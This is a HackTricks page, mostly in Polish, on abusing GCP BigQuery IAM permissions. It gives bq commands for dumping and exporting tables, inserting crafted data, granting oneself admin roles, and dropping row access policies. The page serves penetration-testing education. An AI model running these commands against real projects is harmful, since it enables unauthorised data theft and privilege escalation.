GCP - BigQuery Privesc

Naucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Naucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wspieraj HackTricks

Sprawdź plany subskrypcji!
Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

BigQuery

Więcej informacji o BigQuery znajdziesz tutaj:

GCP - Bigquery Enum

Odczyt Tabeli

Czytając informacje przechowywane w tabeli BigQuery, można znaleźć wrażliwe informacje. Aby uzyskać dostęp do tych informacji, potrzebne są uprawnienia bigquery.tables.get , bigquery.jobs.create i bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Eksport danych

To kolejny sposób na dostęp do danych. Eksportuj je do cloud storage bucket i pobierz pliki z informacjami. Aby wykonać tę akcję, potrzebne są następujące uprawnienia: bigquery.tables.export, bigquery.jobs.create i storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Insert data

Możliwe jest wprowadzenie pewnych zaufanych danych do tabeli Bigquery, aby wykorzystać podatność w innym miejscu. Można to łatwo zrobić za pomocą uprawnień bigquery.tables.get, bigquery.tables.updateData i bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

`bigquery.datasets.setIamPolicy`

Atakujący może nadużyć tego uprawnienia, aby przyznać sobie dodatkowe uprawnienia do zestawu danych BigQuery:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Samo to uprawnienie pozwala na aktualizację dostępu do zestawu danych BigQuery poprzez modyfikację ACLs, które wskazują, kto może uzyskać do niego dostęp:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

`bigquery.tables.setIamPolicy`

Atakujący mógłby nadużyć tego uprawnienia, aby przyznać sobie dalsze uprawnienia do tabeli BigQuery:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Według dokumentacji, z wymienionymi uprawnieniami możliwe jest zaktualizowanie polityki wiersza. Jednakże, używając cli bq potrzebujesz jeszcze: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Możliwe jest znalezienie ID filtra w wynikach enumeracji polityk wierszy. Przykład:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

Jeśli masz bigquery.rowAccessPolicies.delete zamiast bigquery.rowAccessPolicies.update, możesz również po prostu usunąć politykę:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Inną potencjalną opcją obejścia polityk dostępu do wierszy byłoby po prostu zmienienie wartości ograniczonych danych. Jeśli możesz zobaczyć tylko wtedy, gdy term to Cfba, po prostu zmodyfikuj wszystkie rekordy tabeli, aby miały term = "Cfba". Jednak bigquery temu zapobiega.

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wspieraj HackTricks